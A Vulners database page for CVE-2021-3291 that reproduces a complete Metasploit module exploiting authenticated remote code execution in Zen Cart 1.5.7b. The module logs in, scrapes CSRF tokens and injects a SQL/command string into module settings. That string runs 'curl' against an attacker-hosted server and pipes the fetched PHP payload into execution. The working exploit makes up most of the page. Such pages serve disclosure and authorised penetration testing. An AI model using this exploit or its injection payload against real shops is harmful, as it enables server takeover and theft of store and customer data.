Vulners
Lucene search
Zen Cart 1.5.7b - Remote Code Execution (Authenticated)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Zen Cart 1.5.7b - Remote Code Execution (Authenticated) Exploit | 2 Mar 202100:00 | – | zdt |
 | CVE-2021-3291 | 2 Mar 202100:00 | – | circl |
 | Zen Cart 操作系统命令注入漏洞 | 26 Jan 202100:00 | – | cnnvd |
 | Zen Cart Remote Code Execution Vulnerability | 27 Jan 202100:00 | – | cnvd |
 | CVE-2021-3291 | 26 Jan 202106:47 | – | cve |
 | CVE-2021-3291 | 26 Jan 202106:47 | – | cvelist |
 | Zen Cart vulnerable to authenticated remote code execution | 24 May 202217:40 | – | github |
 | CVE-2021-3291 | 26 Jan 202118:16 | – | nvd |
 | GHSA-38F9-4VHQ-9CR8 Zen Cart vulnerable to authenticated remote code execution | 24 May 202217:40 | – | osv |
 | Zen Cart 1.5.7b Remote Code Execution | 2 Mar 202100:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
#
# This exploit write payload in database and trig to command
# a bug in an zencart v1.5.7b web application
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'zencart authenticated remote code execution exploit',
'Description' => %q(
This exploit module execution os command in zencart.
),
'License' => MSF_LICENSE,
'Author' => ['Mucahit Saratar <[email protected]>'], # msf module & research & poc
'References' =>[
[ 'OSVDB', '' ],
[ 'EDB', '' ],
[ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
[ 'CVE', '2021-3291']
],
'Platform' => 'php',
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', { }] ],
'DisclosureDate' => '2021-01-22',
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', '']),
OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
], self.class
)
end
def start_server
ssltut = false
if datastore["SSL"]
ssltut = true
datastore["SSL"] = false
end
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
print_status("payload is on #{get_uri}")
@adresim = get_uri
datastore['SSL'] = true if ssltut
end
def on_request_uri(cli, request)
print_good('First stage is executed ! Sending 2nd stage of the payload')
send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
end
def tabanyol
datastore["BASEPATH"]
end
def isim
datastore["USERNAME"]
end
def parola
datastore["PASSWORD"]
end
def login
#"index.php?cmd=login&camefrom=index.php"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'login',
'camefrom' => 'index.php'
})
# <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
unless res
fail_with(Failure::Unreachable, "Access web application failure")
end
if res.code != 200
fail_with(Failure::Unreachable, "we not have 200 response")
end
if !res.get_cookies.empty?
@cookie = res.get_cookies
@csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
if @csrftoken.empty?
fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
end
vprint_good("login Csrf token: "+@csrftoken)
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
'cookie' => @cookie,
'vars_post' => {
'securityToken' => @csrftoken,
'action' => "do"+@csrftoken,
'admin_name' => isim,
'admin_pass' => parola
})
if res.code != 302
fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
end
true
end
def check
unless login
fail_with(Failure::UnexpectedReply, 'Wrong credentials')
return CheckCode::NotVulnerable('Wrong credentials')
end
print_good("We loged in")
Exploit::CheckCode::Vulnerable
CheckCode::Vulnerable('Authenticated successfully')
end
def exploit
check
start_server
sleep(4)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'edit'
},
'cookie' => @cookie
)
if res.code != 200
fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
end
# <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
if res && res.code == 200
@formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
if @formtoken.empty?
fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
end
#print_good(@formtoken)
# <form name="modules"
@radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
@selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
@textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
@secme = {}
@secme["securityToken"] = @formtoken
for @a in @radiolar
@secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
end
for @a in @selectler
@secme["configuration[#{@a[0]}]"] = "0"
end
for @a in @textarr
@secme["configuration[#{@a[0]}]"] = "0"
end
print_good(@secme.to_s)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'cookie' => @cookie,
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'save'
},
'vars_post' => @secme
)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'edit'
},
'cookie' => @cookie
)
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2021 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.2
CVSS 29
EPSS0.32613